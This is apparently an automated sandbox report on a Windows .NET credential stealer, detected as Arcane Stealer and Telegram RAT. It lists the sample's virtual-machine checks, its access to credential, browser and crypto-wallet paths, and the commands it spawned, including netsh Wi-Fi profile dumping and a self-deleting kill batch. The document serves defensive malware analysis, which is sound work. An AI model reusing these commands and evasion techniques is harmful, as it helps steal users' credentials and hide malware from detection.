                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: zyEDYRU0jw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: zyEDYRU0jw.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: zyEDYRU0jw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: System.Xml.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*\~ source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.000000000725C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.ni.pdbRSDS source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: Stealer.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Management.pdbz_ source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: \??\C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\tdata source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.000000000725C000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\Users\Malware\Desktop\Arcane\Str\Stealer\Stealer\obj\Release\Stealer.pdb source: zyEDYRU0jw.exe
                        Source: Binary string: System.Configuration.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Net.Http.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Security.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: Stealer.pdbMZ source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Configuration.pdbSystem.Core.ni.dll> source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.IO.Compression.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Configuration.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Xml.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Core.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Windows.Forms.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: _prod.pdb\* source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.0000000007232000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Net.Http.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Management.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Drawing.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Management.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.pdb4 source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Core.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS] source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: INETCO~1INetCookies_prod.pdb3475e564b17091598996e6f, source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.00000000071C0000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.IO.Compression.pdbH source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: mscorlib.pdbH source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.ni.pdb source: WER8074.tmp.dmp.17.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER8074.tmp.dmp.17.dr
                        Source: zyEDYRU0jw.exeStatic PE information: 0xB880F835 [Fri Feb 3 01:58:13 2068 UTC]
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_0871FF58 push esp; retf 0_2_0871FF69
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_0871FF36 push esp; retf 0_2_0871FF37
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_0889050B push FFFFFFE8h; iretd 0_2_0889050D
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Queries memory information (via WMI often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
                        Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_PointingDevice
                        Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT EstimatedChargeRemaining, BatteryStatus FROM Win32_Battery
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Model, Size FROM Win32_DiskDrive
                        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, Speed FROM Win32_NetworkAdapter WHERE MACAddress IS NOT NULL
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Description, MACAddress, IPEnabled FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = TRUE
                        Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
                        Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Default FROM Win32_Printer
                        Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DeviceID, FileSystem, FreeSpace, Size FROM Win32_LogicalDisk WHERE DriveType = 3
                        Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_SoundDevice
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeMemory allocated: 1830000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeMemory allocated: 3280000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeMemory allocated: 3080000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWindow / User API: threadDelayed 9859Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, SMBIOSBIOSVersion, ReleaseDate FROM Win32_BIOS
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Product, Manufacturer, SerialNumber FROM Win32_BaseBoard
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\35\Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Credentials\Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\ClientSidePhishing\25\_metadata\Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments\Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Adobe\ARM\Reader_21.005.20060\Jump to behavior
                        Source: zyEDYRU0jw.exeBinary or memory string: VMware
                        Source: zyEDYRU0jw.exeBinary or memory string: Hyper-V
                        Source: zyEDYRU0jw.exeBinary or memory string: IsVirtualMachine
                        Source: zyEDYRU0jw.exeBinary or memory string: virtualqemu
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.000000000725C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: zyEDYRU0jw.exeBinary or memory string: <IsVirtualMachine>b__1_0
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        .NET source code references suspicious native API functions
                        Source: zyEDYRU0jw.exe, Killer.csReference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
                        Source: zyEDYRU0jw.exe, ImportHider.csReference to suspicious API methods: LoadLibrary(dllName)
                        Source: zyEDYRU0jw.exe, ImportHider.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(intPtr, methodName), typeof(T))
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklistJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp5FE0.tmp.batJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4524Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /NobreakJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 4524Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeQueries volume information: C:\Users\user\Desktop\zyEDYRU0jw.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Uses netsh to modify the Windows network and firewall settings
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BC60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: V%ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108454398630.0000000007232000.00000004.00000020.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.108458488368.000000000BC02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.00000000032D6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: pathToSignedReportingExe: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected Arcane Stealer
                        Source: Yara matchFile source: zyEDYRU0jw.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zyEDYRU0jw.exe.d30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zyEDYRU0jw.exe PID: 4524, type: MEMORYSTR
                        Yara detected Telegram RAT
                        Source: Yara matchFile source: zyEDYRU0jw.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zyEDYRU0jw.exe.d30000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.108300525828.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zyEDYRU0jw.exe PID: 4524, type: MEMORYSTR
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.000000000348E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxxLiberty
                        Source: zyEDYRU0jw.exe, 00000000.00000002.108444740921.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet
